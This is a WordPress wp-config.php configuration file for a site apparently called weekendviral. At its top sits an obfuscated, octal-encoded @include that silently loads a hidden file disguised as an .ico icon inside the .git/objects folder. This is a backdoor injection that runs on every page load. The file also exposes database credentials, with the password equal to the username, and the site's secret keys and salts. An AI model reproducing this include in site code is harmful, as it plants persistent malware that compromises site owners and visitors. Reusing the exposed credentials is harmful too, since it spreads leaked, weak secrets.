<?php
/*baf2e*/

@include "\057va\162/w\167w/\150tm\154/w\145ek\145nd\166ir\141l.\143om\057.g\151t/\157bj\145ct\163/p\141ck\057.b\144db\06113\146.i\143o";

/*baf2e*/




















if (
    isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) &&
    $_SERVER["HTTP_X_FORWARDED_PROTO"] == "https"
) {
    $_SERVER["HTTPS"] = "on";
}

  
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'weekendviral' );

/** MySQL database username */
define( 'DB_USER', 'weekendviral' );

/** MySQL database password */
define( 'DB_PASSWORD', 'weekendviral' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         '`tsQlGc<mWg1r@<0uExrwF$Uk?{QIqJAB>y3P>IRW`YyPmiFmGako5jsL5HJ$2D&' );
define( 'SECURE_AUTH_KEY',  'u^o;g$W&azv91`t2 Pe`4ZG0!iX1oKZz2A.Wz53|at@)S[04@sJ8S5l-_QT3:@X;' );
define( 'LOGGED_IN_KEY',    '+l9Cm0a!N-wXuSoVGdJU/~X+9$ew[E9c]]STh taPC`+E%3*3/E|=T%kL>_hD>|[' );
define( 'NONCE_KEY',        'BfB}F H[3)_B31[j8~PP,VX`Q&Nbv>RNGnUO%#K.]H@<8Bstr;c[BkU 8auJxB%h' );
define( 'AUTH_SALT',        'D16nH[.G;)7_C^h%(H3/zfM(2%`i)o;gnSp,u{t[m9;&)MKY;8^U$55co`J6M[=`' );
define( 'SECURE_AUTH_SALT', 'mwQedC0T5~O~%XZQx-*iR>N3bM F*A#8d{AWng5(>?33HxPV18nn-9dz~dh;.N3:' );
define( 'LOGGED_IN_SALT',   'a2sS4)Ufr>:se+}qP#WfF8Fh&O )R}B{*70eT)WC&;0Uwax-Ur;cg_ituHP j}(%' );
define( 'NONCE_SALT',       '74X/Yisk1J)BYG82Heb6E_C`E:)Ry#-{RiErEzlQ^qkK;=fs+ArC8s/4ZYPp+N(b' );

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}

/** Sets up WordPress vars and included files. */
require_once( ABSPATH . 'wp-settings.php' );

